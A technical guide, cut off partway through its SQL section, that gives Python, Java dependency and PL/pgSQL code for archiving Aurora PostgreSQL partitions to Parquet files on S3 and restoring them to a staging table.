Aurora PostgreSQL: Archiving and Restoring Partitions from Large Tables to Iceberg and Parquet on S3

A Complete Guide to Archiving, Restoring, and Querying Large Table Partitions

When dealing with multi-terabyte tables in Aurora PostgreSQL, keeping historical partitions online becomes increasingly expensive and operationally burdensome. This guide presents a complete solution for archiving partitions to S3 in Iceberg/Parquet format, restoring them when needed, and querying archived data directly via a Spring Boot API without database restoration.

1. Architecture Overview

The solution comprises three components:

  1. Archive Script: Exports a partition from Aurora PostgreSQL to Parquet files organised in an Iceberg-style table layout on S3
  2. Restore Script: Imports archived data from S3 back into a staging table for validation and migration to the main table
  3. Query API: A Spring Boot application that reads Parquet files directly from S3, applying predicate pushdown for efficient filtering

This approach reduces storage costs by approximately 70 to 80 percent compared to keeping data in Aurora, while maintaining full queryability through the API layer.
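
For a transactions table partitioned by transaction_date, the scripts below lay out each archived partition on S3 as follows (bucket and prefix are illustrative):

s3://your-archive-bucket/aurora-archives/public/transactions/transaction_date=2024-01/
    data/
        data_00000.parquet
        data_00001.parquet
    metadata/
        v1.metadata.json
        manifest_list.json
        version_hint.text
    schema_snapshot.json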

2. Prerequisites and Dependencies

2.1 Python Environment

pip install boto3 pyarrow psycopg2-binary pandas

(pyiceberg and sqlalchemy are not required by the scripts below; install pyiceberg only if you want catalog-managed, spec-compliant Iceberg tables instead of the simplified layout this guide writes directly.)

2.2 AWS Configuration

Ensure your environment has appropriate IAM permissions. The S3 statement covers everything the scripts below need; the Glue statement is only required if you additionally register archives in the Glue Data Catalog:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "s3:PutObject",
                "s3:GetObject",
                "s3:ListBucket",
                "s3:DeleteObject"
            ],
            "Resource": [
                "arn:aws:s3:::your-archive-bucket",
                "arn:aws:s3:::your-archive-bucket/*"
            ]
        },
        {
            "Effect": "Allow",
            "Action": [
                "glue:CreateTable",
                "glue:GetTable",
                "glue:UpdateTable",
                "glue:DeleteTable"
            ],
            "Resource": "*"
        }
    ]
}

2.3 Java Dependencies

For the Spring Boot API, add these to your pom.xml:

<dependencies>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-web</artifactId>
    </dependency>
    <dependency>
        <groupId>org.apache.parquet</groupId>
        <artifactId>parquet-avro</artifactId>
        <version>1.14.1</version>
    </dependency>
    <dependency>
        <groupId>org.apache.hadoop</groupId>
        <artifactId>hadoop-aws</artifactId>
        <version>3.3.6</version>
    </dependency>
    <dependency>
        <groupId>org.apache.hadoop</groupId>
        <artifactId>hadoop-common</artifactId>
        <version>3.3.6</version>
    </dependency>
    <dependency>
        <groupId>software.amazon.awssdk</groupId>
        <artifactId>s3</artifactId>
        <version>2.25.0</version>
    </dependency>
    <dependency>
        <groupId>org.apache.iceberg</groupId>
        <artifactId>iceberg-core</artifactId>
        <version>1.5.0</version>
    </dependency>
    <dependency>
        <groupId>org.apache.iceberg</groupId>
        <artifactId>iceberg-parquet</artifactId>
        <version>1.5.0</version>
    </dependency>
    <dependency>
        <groupId>org.apache.iceberg</groupId>
        <artifactId>iceberg-aws</artifactId>
        <version>1.5.0</version>
    </dependency>
</dependencies>

3. The Archive Script

This script extracts a partition from Aurora PostgreSQL and writes it to S3 as Parquet data files accompanied by Iceberg-style metadata. One caveat up front: the metadata written here is a simplified JSON layout modelled on the Iceberg spec, not a fully compliant Iceberg table (real Iceberg manifests are Avro files, usually managed through a catalog), so engines such as Athena or Spark will not read it directly. The restore script and the query API in this guide understand the layout; use pyiceberg where spec-compliant, catalog-managed tables are required.

3.1 Configuration Module

# config.py

from dataclasses import dataclass
from typing import Optional
import os


@dataclass
class DatabaseConfig:
    host: str
    port: int
    database: str
    user: str
    password: str

    @classmethod
    def from_environment(cls) -> "DatabaseConfig":
        return cls(
            host=os.environ["AURORA_HOST"],
            port=int(os.environ.get("AURORA_PORT", "5432")),
            database=os.environ["AURORA_DATABASE"],
            user=os.environ["AURORA_USER"],
            password=os.environ["AURORA_PASSWORD"]
        )

    @property
    def connection_string(self) -> str:
        return f"postgresql://{self.user}:{self.password}@{self.host}:{self.port}/{self.database}"


@dataclass
class S3Config:
    bucket: str
    prefix: str
    region: str

    @classmethod
    def from_environment(cls) -> "S3Config":
        return cls(
            bucket=os.environ["ARCHIVE_S3_BUCKET"],
            prefix=os.environ.get("ARCHIVE_S3_PREFIX", "aurora-archives"),
            region=os.environ.get("AWS_REGION", "eu-west-1")
        )


@dataclass
class ArchiveConfig:
    table_name: str
    partition_column: str
    partition_value: str
    schema_name: str = "public"
    batch_size: int = 100000
    compression: str = "snappy"
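
A minimal sketch of wiring these configurations together; it assumes the AURORA_* and ARCHIVE_S3_* environment variables read by the from_environment methods are set:

# wire_configs.py

from config import ArchiveConfig, DatabaseConfig, S3Config

db_config = DatabaseConfig.from_environment()   # AURORA_HOST, AURORA_DATABASE, AURORA_USER, AURORA_PASSWORD
s3_config = S3Config.from_environment()         # ARCHIVE_S3_BUCKET; prefix and region have defaults
archive_config = ArchiveConfig(
    table_name="transactions",
    partition_column="transaction_date",
    partition_value="2024-01"
)

print(db_config.connection_string)
print(f"s3://{s3_config.bucket}/{s3_config.prefix}")
print(f"batch size: {archive_config.batch_size}")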

3.2 Schema Introspection

# schema_inspector.py

from typing import Dict, List, Tuple, Any
import psycopg2
from psycopg2.extras import RealDictCursor
import pyarrow as pa


class SchemaInspector:
    """Inspects PostgreSQL table schema and converts to PyArrow schema."""

    POSTGRES_TO_ARROW = {
        "integer": pa.int32(),
        "bigint": pa.int64(),
        "smallint": pa.int16(),
        "real": pa.float32(),
        "double precision": pa.float64(),
        "numeric": pa.decimal128(38, 10),
        "text": pa.string(),
        "character varying": pa.string(),
        "varchar": pa.string(),
        "char": pa.string(),
        "character": pa.string(),
        "boolean": pa.bool_(),
        "date": pa.date32(),
        "timestamp without time zone": pa.timestamp("us"),
        "timestamp with time zone": pa.timestamp("us", tz="UTC"),
        "time without time zone": pa.time64("us"),
        "time with time zone": pa.time64("us"),
        "uuid": pa.string(),
        "json": pa.string(),
        "jsonb": pa.string(),
        "bytea": pa.binary(),
    }

    def __init__(self, connection_string: str):
        self.connection_string = connection_string

    def get_table_columns(
        self, 
        schema_name: str, 
        table_name: str
    ) -> List[Dict[str, Any]]:
        """Retrieve column definitions from information_schema."""
        query = """
            SELECT 
                column_name,
                data_type,
                is_nullable,
                column_default,
                ordinal_position,
                character_maximum_length,
                numeric_precision,
                numeric_scale
            FROM information_schema.columns
            WHERE table_schema = %s 
              AND table_name = %s
            ORDER BY ordinal_position
        """

        with psycopg2.connect(self.connection_string) as conn:
            with conn.cursor(cursor_factory=RealDictCursor) as cur:
                cur.execute(query, (schema_name, table_name))
                return list(cur.fetchall())

    def get_primary_key_columns(
        self, 
        schema_name: str, 
        table_name: str
    ) -> List[str]:
        """Retrieve primary key column names."""
        query = """
            SELECT a.attname
            FROM pg_index i
            JOIN pg_attribute a ON a.attrelid = i.indrelid 
                AND a.attnum = ANY(i.indkey)
            JOIN pg_class c ON c.oid = i.indrelid
            JOIN pg_namespace n ON n.oid = c.relnamespace
            WHERE i.indisprimary
              AND n.nspname = %s
              AND c.relname = %s
            ORDER BY array_position(i.indkey, a.attnum)
        """

        with psycopg2.connect(self.connection_string) as conn:
            with conn.cursor() as cur:
                cur.execute(query, (schema_name, table_name))
                return [row[0] for row in cur.fetchall()]

    def postgres_type_to_arrow(
        self, 
        pg_type: str, 
        precision: int = None, 
        scale: int = None
    ) -> pa.DataType:
        """Convert PostgreSQL type to PyArrow type."""
        pg_type_lower = pg_type.lower()

        # precision/scale may legitimately be 0, so test against None explicitly
        if pg_type_lower == "numeric" and precision is not None and scale is not None:
            return pa.decimal128(precision, scale)

        if pg_type_lower in self.POSTGRES_TO_ARROW:
            return self.POSTGRES_TO_ARROW[pg_type_lower]

        if pg_type_lower.startswith("character varying"):
            return pa.string()

        if pg_type_lower.endswith("[]"):
            base_type = pg_type_lower[:-2]
            if base_type in self.POSTGRES_TO_ARROW:
                return pa.list_(self.POSTGRES_TO_ARROW[base_type])

        return pa.string()

    def build_arrow_schema(
        self, 
        schema_name: str, 
        table_name: str
    ) -> pa.Schema:
        """Build PyArrow schema from PostgreSQL table definition."""
        columns = self.get_table_columns(schema_name, table_name)

        fields = []
        for col in columns:
            arrow_type = self.postgres_type_to_arrow(
                col["data_type"],
                col.get("numeric_precision"),
                col.get("numeric_scale")
            )
            nullable = col["is_nullable"] == "YES"
            fields.append(pa.field(col["column_name"], arrow_type, nullable=nullable))

        # pa.schema() (lowercase) is the factory; pa.Schema cannot be instantiated directly
        return pa.schema(fields)

    def get_partition_info(
        self, 
        schema_name: str, 
        table_name: str
    ) -> Dict[str, Any]:
        """Get partition strategy information if table is partitioned."""
        query = """
            SELECT 
                pt.partstrat,
                array_agg(a.attname ORDER BY pos.idx) as partition_columns
            FROM pg_partitioned_table pt
            JOIN pg_class c ON c.oid = pt.partrelid
            JOIN pg_namespace n ON n.oid = c.relnamespace
            CROSS JOIN LATERAL unnest(pt.partattrs) WITH ORDINALITY AS pos(attnum, idx)
            JOIN pg_attribute a ON a.attrelid = c.oid AND a.attnum = pos.attnum
            WHERE n.nspname = %s AND c.relname = %s
            GROUP BY pt.partstrat
        """

        with psycopg2.connect(self.connection_string) as conn:
            with conn.cursor(cursor_factory=RealDictCursor) as cur:
                cur.execute(query, (schema_name, table_name))
                result = cur.fetchone()

                if result:
                    strategy_map = {"r": "range", "l": "list", "h": "hash"}
                    return {
                        "is_partitioned": True,
                        "strategy": strategy_map.get(result["partstrat"], "unknown"),
                        "partition_columns": result["partition_columns"]
                    }

                return {"is_partitioned": False}

3.3 Archive Script

#!/usr/bin/env python3
# archive_partition.py

"""
Archive a partition from Aurora PostgreSQL to S3 in Iceberg/Parquet format.

Usage:
    python archive_partition.py \
        --table transactions \
        --partition-column transaction_date \
        --partition-value 2024-01 \
        --schema public
"""

import argparse
import json
import logging
import sys
from datetime import datetime
from pathlib import Path
from typing import Generator, Dict, Any, Optional
import uuid

import boto3
import pandas as pd
import psycopg2
from psycopg2.extras import RealDictCursor
import pyarrow as pa
import pyarrow.parquet as pq

from config import DatabaseConfig, S3Config, ArchiveConfig
from schema_inspector import SchemaInspector


logging.basicConfig(
    level=logging.INFO,
    format="%(asctime)s [%(levelname)s] %(message)s"
)
logger = logging.getLogger(__name__)


class PartitionArchiver:
    """Archives PostgreSQL partitions to S3 in Iceberg format."""

    def __init__(
        self,
        db_config: DatabaseConfig,
        s3_config: S3Config,
        archive_config: ArchiveConfig
    ):
        self.db_config = db_config
        self.s3_config = s3_config
        self.archive_config = archive_config
        self.schema_inspector = SchemaInspector(db_config.connection_string)
        self.s3_client = boto3.client("s3", region_name=s3_config.region)

    def _generate_archive_path(self) -> str:
        """Generate S3 path for archive files."""
        return (
            f"{self.s3_config.prefix}/"
            f"{self.archive_config.schema_name}/"
            f"{self.archive_config.table_name}/"
            f"{self.archive_config.partition_column}={self.archive_config.partition_value}"
        )

    def _build_extraction_query(self) -> str:
        """Build query to extract partition data."""
        full_table = (
            f"{self.archive_config.schema_name}.{self.archive_config.table_name}"
        )

        partition_info = self.schema_inspector.get_partition_info(
            self.archive_config.schema_name,
            self.archive_config.table_name
        )

        if partition_info["is_partitioned"]:
            # Assumes child partitions follow the <table>_<value> naming
            # convention (e.g. transactions_2024_01); adjust if yours differ
            partition_table = (
                f"{self.archive_config.table_name}_"
                f"{self.archive_config.partition_value.replace('-', '_')}"
            )
            return f"SELECT * FROM {self.archive_config.schema_name}.{partition_table}"

        return (
            f"SELECT * FROM {full_table} "
            f"WHERE {self.archive_config.partition_column} = %s"
        )

    def _stream_partition_data(self) -> Generator[pd.DataFrame, None, None]:
        """Stream partition data in batches."""
        query = self._build_extraction_query()
        partition_info = self.schema_inspector.get_partition_info(
            self.archive_config.schema_name,
            self.archive_config.table_name
        )

        with psycopg2.connect(self.db_config.connection_string) as conn:
            with conn.cursor(
                name="archive_cursor",
                cursor_factory=RealDictCursor
            ) as cur:
                if partition_info["is_partitioned"]:
                    cur.execute(query)
                else:
                    cur.execute(query, (self.archive_config.partition_value,))

                while True:
                    rows = cur.fetchmany(self.archive_config.batch_size)
                    if not rows:
                        break
                    yield pd.DataFrame(rows)

    def _write_parquet_to_s3(
        self,
        table: pa.Table,
        file_number: int,
        arrow_schema: pa.Schema
    ) -> Dict[str, Any]:
        """Write a Parquet file to S3 and return metadata."""
        archive_path = self._generate_archive_path()
        file_name = f"data_{file_number:05d}.parquet"
        s3_key = f"{archive_path}/data/{file_name}"

        buffer = pa.BufferOutputStream()
        pq.write_table(
            table,
            buffer,
            compression=self.archive_config.compression,
            write_statistics=True
        )

        data = buffer.getvalue().to_pybytes()

        self.s3_client.put_object(
            Bucket=self.s3_config.bucket,
            Key=s3_key,
            Body=data,
            ContentType="application/octet-stream"
        )

        return {
            "path": f"s3://{self.s3_config.bucket}/{s3_key}",
            "file_size_bytes": len(data),
            "record_count": table.num_rows
        }

    def _write_iceberg_metadata(
        self,
        arrow_schema: pa.Schema,
        data_files: list,
        total_records: int
    ) -> None:
        """Write Iceberg table metadata files."""
        archive_path = self._generate_archive_path()

        schema_dict = {
            "type": "struct",
            "schema_id": 0,
            "fields": []
        }

        for i, field in enumerate(arrow_schema):
            field_type = self._arrow_to_iceberg_type(field.type)
            schema_dict["fields"].append({
                "id": i + 1,
                "name": field.name,
                "required": not field.nullable,
                "type": field_type
            })

        table_uuid = str(uuid.uuid4())

        manifest_entries = []
        for df in data_files:
            manifest_entries.append({
                "status": 1,
                "snapshot_id": 1,
                "data_file": {
                    "file_path": df["path"],
                    "file_format": "PARQUET",
                    "record_count": df["record_count"],
                    "file_size_in_bytes": df["file_size_bytes"]
                }
            })

        metadata = {
            "format_version": 2,
            "table_uuid": table_uuid,
            "location": f"s3://{self.s3_config.bucket}/{archive_path}",
            "last_sequence_number": 1,
            "last_updated_ms": int(datetime.utcnow().timestamp() * 1000),
            "last_column_id": len(arrow_schema),
            "current_schema_id": 0,
            "schemas": [schema_dict],
            "partition_spec": [],
            "default_spec_id": 0,
            "last_partition_id": 0,
            "properties": {
                "source.table": self.archive_config.table_name,
                "source.schema": self.archive_config.schema_name,
                "source.partition_column": self.archive_config.partition_column,
                "source.partition_value": self.archive_config.partition_value,
                "archive.timestamp": datetime.utcnow().isoformat(),
                "archive.total_records": str(total_records)
            },
            "current_snapshot_id": 1,
            "snapshots": [
                {
                    "snapshot_id": 1,
                    "timestamp_ms": int(datetime.utcnow().timestamp() * 1000),
                    "summary": {
                        "operation": "append",
                        "added_data_files": str(len(data_files)),
                        "total_records": str(total_records)
                    },
                    "manifest_list": f"s3://{self.s3_config.bucket}/{archive_path}/metadata/manifest_list.json"
                }
            ]
        }

        self.s3_client.put_object(
            Bucket=self.s3_config.bucket,
            Key=f"{archive_path}/metadata/v1.metadata.json",
            Body=json.dumps(metadata, indent=2),
            ContentType="application/json"
        )

        self.s3_client.put_object(
            Bucket=self.s3_config.bucket,
            Key=f"{archive_path}/metadata/manifest_list.json",
            Body=json.dumps(manifest_entries, indent=2),
            ContentType="application/json"
        )

        self.s3_client.put_object(
            Bucket=self.s3_config.bucket,
            Key=f"{archive_path}/metadata/version_hint.text",
            Body="1",
            ContentType="text/plain"
        )

    def _arrow_to_iceberg_type(self, arrow_type: pa.DataType) -> str:
        """Convert PyArrow type to Iceberg type string."""
        type_mapping = {
            pa.int16(): "int",
            pa.int32(): "int",
            pa.int64(): "long",
            pa.float32(): "float",
            pa.float64(): "double",
            pa.bool_(): "boolean",
            pa.string(): "string",
            pa.binary(): "binary",
            pa.date32(): "date",
        }

        if arrow_type in type_mapping:
            return type_mapping[arrow_type]

        if pa.types.is_timestamp(arrow_type):
            if arrow_type.tz:
                return "timestamptz"
            return "timestamp"

        if pa.types.is_decimal(arrow_type):
            return f"decimal({arrow_type.precision},{arrow_type.scale})"

        if pa.types.is_list(arrow_type):
            inner = self._arrow_to_iceberg_type(arrow_type.value_type)
            return f"list<{inner}>"

        return "string"

    def _save_schema_snapshot(self, arrow_schema: pa.Schema) -> None:
        """Save schema information for restore validation."""
        archive_path = self._generate_archive_path()

        columns = self.schema_inspector.get_table_columns(
            self.archive_config.schema_name,
            self.archive_config.table_name
        )

        pk_columns = self.schema_inspector.get_primary_key_columns(
            self.archive_config.schema_name,
            self.archive_config.table_name
        )

        schema_snapshot = {
            "source_table": {
                "schema": self.archive_config.schema_name,
                "table": self.archive_config.table_name
            },
            "columns": columns,
            "primary_key_columns": pk_columns,
            "arrow_schema": arrow_schema.to_string(),
            "archived_at": datetime.utcnow().isoformat()
        }

        self.s3_client.put_object(
            Bucket=self.s3_config.bucket,
            Key=f"{archive_path}/schema_snapshot.json",
            Body=json.dumps(schema_snapshot, indent=2, default=str),
            ContentType="application/json"
        )

    def archive(self) -> Dict[str, Any]:
        """Execute the archive operation."""
        logger.info(
            f"Starting archive of {self.archive_config.schema_name}."
            f"{self.archive_config.table_name} "
            f"partition {self.archive_config.partition_column}="
            f"{self.archive_config.partition_value}"
        )

        arrow_schema = self.schema_inspector.build_arrow_schema(
            self.archive_config.schema_name,
            self.archive_config.table_name
        )

        self._save_schema_snapshot(arrow_schema)

        data_files = []
        total_records = 0
        file_number = 0

        for batch_df in self._stream_partition_data():
            table = pa.Table.from_pandas(batch_df, schema=arrow_schema)
            file_meta = self._write_parquet_to_s3(table, file_number, arrow_schema)
            data_files.append(file_meta)
            total_records += file_meta["record_count"]
            file_number += 1

            logger.info(
                f"Written file {file_number}: {file_meta['record_count']} records"
            )

        self._write_iceberg_metadata(arrow_schema, data_files, total_records)

        result = {
            "status": "success",
            "table": f"{self.archive_config.schema_name}.{self.archive_config.table_name}",
            "partition": f"{self.archive_config.partition_column}={self.archive_config.partition_value}",
            "location": f"s3://{self.s3_config.bucket}/{self._generate_archive_path()}",
            "total_records": total_records,
            "total_files": len(data_files),
            "total_bytes": sum(f["file_size_bytes"] for f in data_files),
            "archived_at": datetime.utcnow().isoformat()
        }

        logger.info(f"Archive complete: {total_records} records in {len(data_files)} files")
        return result


def main():
    parser = argparse.ArgumentParser(
        description="Archive Aurora PostgreSQL partition to S3"
    )
    parser.add_argument("--table", required=True, help="Table name")
    parser.add_argument("--partition-column", required=True, help="Partition column name")
    parser.add_argument("--partition-value", required=True, help="Partition value to archive")
    parser.add_argument("--schema", default="public", help="Schema name")
    parser.add_argument("--batch-size", type=int, default=100000, help="Batch size for streaming")

    args = parser.parse_args()

    db_config = DatabaseConfig.from_environment()
    s3_config = S3Config.from_environment()
    archive_config = ArchiveConfig(
        table_name=args.table,
        partition_column=args.partition_column,
        partition_value=args.partition_value,
        schema_name=args.schema,
        batch_size=args.batch_size
    )

    archiver = PartitionArchiver(db_config, s3_config, archive_config)
    result = archiver.archive()

    print(json.dumps(result, indent=2))
    return 0


if __name__ == "__main__":
    sys.exit(main())
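
After a run, it is worth sanity-checking what actually landed on S3. A minimal verification sketch that reads back the metadata written by _write_iceberg_metadata (the bucket and path are illustrative):

# verify_archive.py

import json

import boto3

BUCKET = "your-archive-bucket"
PATH = "aurora-archives/public/transactions/transaction_date=2024-01"

s3 = boto3.client("s3")

metadata = json.loads(
    s3.get_object(Bucket=BUCKET, Key=f"{PATH}/metadata/v1.metadata.json")["Body"].read()
)
print("records archived:", metadata["properties"]["archive.total_records"])

manifest = json.loads(
    s3.get_object(Bucket=BUCKET, Key=f"{PATH}/metadata/manifest_list.json")["Body"].read()
)
print("data files:", len(manifest))
print("total bytes:", sum(e["data_file"]["file_size_in_bytes"] for e in manifest))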

4. The Restore Script

This script reverses the archive operation by reading Parquet files from S3 and loading them into a staging table.

4.1 Restore Script

#!/usr/bin/env python3
# restore_partition.py

"""
Restore an archived partition from S3 back to Aurora PostgreSQL.

Usage:
    python restore_partition.py \
        --source-path s3://bucket/prefix/schema/table/partition_col=value \
        --target-table transactions_staging \
        --target-schema public
"""

import argparse
import io
import json
import logging
import sys
from datetime import datetime
from typing import Dict, Any, List, Optional
from urllib.parse import urlparse

import boto3
import pandas as pd
import psycopg2
from psycopg2 import sql
from psycopg2.extras import execute_values
import pyarrow.parquet as pq

from config import DatabaseConfig


logging.basicConfig(
    level=logging.INFO,
    format="%(asctime)s [%(levelname)s] %(message)s"
)
logger = logging.getLogger(__name__)


class PartitionRestorer:
    """Restores archived partitions from S3 to PostgreSQL."""

    def __init__(
        self,
        db_config: DatabaseConfig,
        source_path: str,
        target_schema: str,
        target_table: str,
        create_table: bool = True,
        batch_size: int = 10000
    ):
        self.db_config = db_config
        self.source_path = source_path
        self.target_schema = target_schema
        self.target_table = target_table
        self.create_table = create_table
        self.batch_size = batch_size

        parsed = urlparse(source_path)
        self.bucket = parsed.netloc
        self.prefix = parsed.path.lstrip("/")

        self.s3_client = boto3.client("s3")

    def _load_schema_snapshot(self) -> Dict[str, Any]:
        """Load the schema snapshot from the archive."""
        response = self.s3_client.get_object(
            Bucket=self.bucket,
            Key=f"{self.prefix}/schema_snapshot.json"
        )
        return json.loads(response["Body"].read())

    def _load_iceberg_metadata(self) -> Dict[str, Any]:
        """Load Iceberg metadata."""
        response = self.s3_client.get_object(
            Bucket=self.bucket,
            Key=f"{self.prefix}/metadata/v1.metadata.json"
        )
        return json.loads(response["Body"].read())

    def _list_data_files(self) -> List[str]:
        """List all Parquet data files in the archive."""
        data_prefix = f"{self.prefix}/data/"

        files = []
        paginator = self.s3_client.get_paginator("list_objects_v2")

        for page in paginator.paginate(Bucket=self.bucket, Prefix=data_prefix):
            for obj in page.get("Contents", []):
                if obj["Key"].endswith(".parquet"):
                    files.append(obj["Key"])

        return sorted(files)

    def _postgres_type_from_column_def(self, col: Dict[str, Any]) -> str:
        """Convert column definition to PostgreSQL type."""
        data_type = col["data_type"]

        if data_type == "character varying":
            max_len = col.get("character_maximum_length")
            if max_len:
                return f"varchar({max_len})"
            return "text"

        if data_type == "numeric":
            precision = col.get("numeric_precision")
            scale = col.get("numeric_scale")
            if precision and scale:
                return f"numeric({precision},{scale})"
            return "numeric"

        return data_type

    def _create_staging_table(
        self,
        schema_snapshot: Dict[str, Any],
        conn: psycopg2.extensions.connection
    ) -> None:
        """Create the staging table based on archived schema."""
        columns = schema_snapshot["columns"]

        column_defs = []
        for col in columns:
            pg_type = self._postgres_type_from_column_def(col)
            nullable = "" if col["is_nullable"] == "YES" else " NOT NULL"
            column_defs.append(f'    "{col["column_name"]}" {pg_type}{nullable}')

        create_sql = f"""
            DROP TABLE IF EXISTS {self.target_schema}.{self.target_table};
            CREATE TABLE {self.target_schema}.{self.target_table} (
{chr(10).join(column_defs)}
            )
        """

        with conn.cursor() as cur:
            cur.execute(create_sql)
        conn.commit()

        logger.info(f"Created staging table {self.target_schema}.{self.target_table}")

    def _insert_batch(
        self,
        df: pd.DataFrame,
        columns: List[str],
        conn: psycopg2.extensions.connection
    ) -> int:
        """Insert a batch of records into the staging table."""
        if df.empty:
            return 0

        df = df.copy()  # the caller passes a slice; avoid mutating it

        # Convert datetimes to ISO strings, box numpy scalars as plain Python
        # objects (psycopg2 cannot adapt numpy types), and turn NaN/NaT into NULLs
        for col in df.columns:
            if pd.api.types.is_datetime64_any_dtype(df[col]):
                df[col] = df[col].apply(
                    lambda x: x.isoformat() if pd.notna(x) else None
                )

        prepared = df[columns].astype(object).where(df[columns].notna(), None)
        values = [tuple(row) for row in prepared.to_numpy()]

        column_names = ", ".join(f'"{c}"' for c in columns)
        insert_sql = f"""
            INSERT INTO {self.target_schema}.{self.target_table} ({column_names})
            VALUES %s
        """

        with conn.cursor() as cur:
            execute_values(cur, insert_sql, values, page_size=self.batch_size)

        return len(values)

    def restore(self) -> Dict[str, Any]:
        """Execute the restore operation."""
        logger.info(f"Starting restore from {self.source_path}")

        schema_snapshot = self._load_schema_snapshot()
        metadata = self._load_iceberg_metadata()
        data_files = self._list_data_files()

        expected = metadata["properties"].get("archive.total_records", "unknown")
        logger.info(
            f"Found {len(data_files)} data files to restore "
            f"({expected} records expected)"
        )

        columns = [col["column_name"] for col in schema_snapshot["columns"]]

        with psycopg2.connect(self.db_config.connection_string) as conn:
            if self.create_table:
                self._create_staging_table(schema_snapshot, conn)

            total_records = 0

            for file_key in data_files:
                logger.info(f"Restoring from {file_key}")

                response = self.s3_client.get_object(Bucket=self.bucket, Key=file_key)
                # StreamingBody is not seekable, so buffer the object before
                # handing it to PyArrow
                table = pq.read_table(io.BytesIO(response["Body"].read()))
                df = table.to_pandas()

                file_records = 0
                for start in range(0, len(df), self.batch_size):
                    batch_df = df.iloc[start:start + self.batch_size]
                    inserted = self._insert_batch(batch_df, columns, conn)
                    file_records += inserted

                conn.commit()
                total_records += file_records
                logger.info(f"Restored {file_records} records from {file_key}")

        result = {
            "status": "success",
            "source": self.source_path,
            "target": f"{self.target_schema}.{self.target_table}",
            "total_records": total_records,
            "files_processed": len(data_files),
            "restored_at": datetime.utcnow().isoformat()
        }

        logger.info(f"Restore complete: {total_records} records")
        return result


def main():
    parser = argparse.ArgumentParser(
        description="Restore archived partition from S3 to PostgreSQL"
    )
    parser.add_argument("--source-path", required=True, help="S3 path to archived partition")
    parser.add_argument("--target-table", required=True, help="Target table name")
    parser.add_argument("--target-schema", default="public", help="Target schema name")
    parser.add_argument("--batch-size", type=int, default=10000, help="Insert batch size")
    parser.add_argument("--no-create", action="store_true", help="Don't create table, assume it exists")

    args = parser.parse_args()

    db_config = DatabaseConfig.from_environment()

    restorer = PartitionRestorer(
        db_config=db_config,
        source_path=args.source_path,
        target_schema=args.target_schema,
        target_table=args.target_table,
        create_table=not args.no_create,
        batch_size=args.batch_size
    )

    result = restorer.restore()
    print(json.dumps(result, indent=2))
    return 0


if __name__ == "__main__":
    sys.exit(main())
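
Before migrating any further, compare the restored row count against what the archive claims to contain. A sketch, assuming the staging table and archive path from the usage example above:

# verify_restore.py

import json

import boto3
import psycopg2

from config import DatabaseConfig

BUCKET = "your-archive-bucket"
PATH = "aurora-archives/public/transactions/transaction_date=2024-01"

metadata = json.loads(
    boto3.client("s3").get_object(
        Bucket=BUCKET, Key=f"{PATH}/metadata/v1.metadata.json"
    )["Body"].read()
)
expected = int(metadata["properties"]["archive.total_records"])

with psycopg2.connect(DatabaseConfig.from_environment().connection_string) as conn:
    with conn.cursor() as cur:
        cur.execute("SELECT COUNT(*) FROM public.transactions_staging")
        actual = cur.fetchone()[0]

status = "OK" if actual == expected else "MISMATCH"
print(f"expected {expected}, restored {actual}: {status}")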

5. SQL Operations for Partition Migration

Once data is restored to a staging table, you need SQL operations to validate and migrate it to the main table.

5.1 Schema Validation

-- Validate that staging table schema matches the main table

CREATE OR REPLACE FUNCTION validate_table_schemas(
    p_source_schema TEXT,
    p_source_table TEXT,
    p_target_schema TEXT,
    p_target_table TEXT
) RETURNS TABLE (
    validation_type TEXT,
    column_name TEXT,
    source_value TEXT,
    target_value TEXT,
    is_valid BOOLEAN
) AS $$
BEGIN
    -- Check column count
    RETURN QUERY
    SELECT 
        'column_count'::TEXT,
        NULL::TEXT,
        src.cnt::TEXT,
        tgt.cnt::TEXT,
        src.cnt = tgt.cnt
    FROM 
        (SELECT COUNT(*)::INT AS cnt 
         FROM information_schema.columns 
         WHERE table_schema = p_source_schema 
           AND table_name = p_source_table) src,
        (SELECT COUNT(*)::INT AS cnt 
         FROM information_schema.columns 
         WHERE table_schema = p_target_schema 
           AND table_name = p_target_table) tgt;

    -- Check each column exists with matching type
    RETURN QUERY
    SELECT 
        'column_definition'::TEXT,
        src.column_name,
        src.data_type || COALESCE('(' || src.character_maximum_length::TEXT || ')', ''),
        COALESCE(tgt.data_type || COALESCE('(' || tgt.character_maximum_length::TEXT || ')', ''), 'MISSING'),
        src.data_type = COALESCE(tgt.data_type, '') 
            AND COALESCE(src.character_maximum_length, 0) = COALESCE(tgt.character_maximum_length, 0)
    FROM 
        information_schema.columns src
    LEFT JOIN 
        information_schema.columns tgt 
        ON tgt.table_schema = p_target_schema 
        AND tgt.table_name = p_target_table
        AND tgt.column_name = src.column_name
    WHERE 
        src.table_schema = p_source_schema 
        AND src.table_name = p_source_table
    ORDER BY src.ordinal_position;

    -- Check nullability
    RETURN QUERY
    SELECT 
        'nullability'::TEXT,
        src.column_name,
        src.is_nullable,
        COALESCE(tgt.is_nullable, 'MISSING'),
        src.is_nullable = COALESCE(tgt.is_nullable, '')
    FROM 
        information_schema.columns src
    LEFT JOIN 
        information_schema.columns tgt 
        ON tgt.table_schema = p_target_schema 
        AND tgt.table_name = p_target_table
        AND tgt.column_name = src.column_name
    WHERE 
        src.table_schema = p_source_schema 
        AND src.table_name = p_source_table
    ORDER BY src.ordinal_position;
END;
$$ LANGUAGE plpgsql;

-- Usage
SELECT * FROM validate_table_schemas('public', 'transactions_staging', 'public', 'transactions');

5.2 Comprehensive Validation Report

-- Generate a full validation report before migration

CREATE OR REPLACE FUNCTION generate_migration_report(
    p_staging_schema TEXT,
    p_staging_table TEXT,
    p_target_schema TEXT,
    p_target_table TEXT,
    p_partition_column TEXT,
    p_partition_value TEXT
) RETURNS TABLE (
    check_name TEXT,
    result TEXT,
    details JSONB
) AS $$
DECLARE
    v_staging_count BIGINT;
    v_existing_count BIGINT;
    v_schema_valid BOOLEAN;
    v_null_count BIGINT;
    r RECORD;
BEGIN
    -- Get staging table count
    EXECUTE format(
        'SELECT COUNT(*) FROM %I.%I',
        p_staging_schema, p_staging_table
    ) INTO v_staging_count;

    RETURN QUERY SELECT 
        'staging_record_count'::TEXT,
        'INFO'::TEXT,
        jsonb_build_object('count', v_staging_count);

    -- Check for existing data in target partition
    BEGIN
        EXECUTE format(
            'SELECT COUNT(*) FROM %I.%I WHERE %I = $1',
            p_target_schema, p_target_table, p_partition_column
